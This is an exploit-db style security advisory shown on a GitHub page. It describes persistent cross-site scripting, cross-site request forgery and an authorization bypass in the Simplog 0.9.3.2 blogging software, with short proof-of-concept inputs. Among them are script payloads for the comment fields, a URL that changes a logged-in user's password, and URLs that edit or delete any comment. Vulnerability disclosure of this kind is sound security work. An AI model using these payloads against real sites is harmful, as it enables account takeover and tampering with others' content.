forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path10180.txt
More file actions
executable file
·97 lines (63 loc) · 2.67 KB
/
Copy path10180.txt
File metadata and controls
executable file
·97 lines (63 loc) · 2.67 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
################################################################################
Mutliple Vulnerabilities in Simplog v0.9.3.2
Name Multiple vulnerabilities in Simplog
Systems Affected Simplog 0.9.3.2 and possibly earlier versions
Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################
############
1. OVERVIEW
############
Simplog provides an easy way for users to add blogging capabilities to their existing websites.
Simplog is written in PHP and compatible with multiple databases.
Simplog also features an RSS/Atom aggregator/reader.
###############
2. DESCRIPTION
###############
Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.
######################
3. TECHNICAL DETAILS
######################
Summery:
(A) Persistent Cross-site Scripting
(B) Cross Site Request Forgery
(C) Edit/Delete Comments (Bypassing Authorization)
(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++
Vulnerable page comments.php
Vulnerable Parameters cname, email
When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.
++++
POC
++++
Put this in the comment:
Name: alert("AMol_NAik")
email:">alert("AMol_NAik")
(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++
Vulnerable Page user.php
This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.
++++
POC
++++
http://server/simplog/user.php?pass1=&pass2=&blogid=&act=change
For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".
http://server/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change
(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable Page comments.php
Vulnerable Parameters op, cid
The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.
++++
POC
++++
Edit comment: http://server/simplog/comments.php?op=edit&cid=
Delete Comment: http://server/simplog/comments.php?op=del&cid=
############
4. TimeLine
############
03/11/2009 Bug Discovered
03/11/2009 Reported to Vendor
16/11/2009 No response received till the date
16/11/2009 Public Disclosure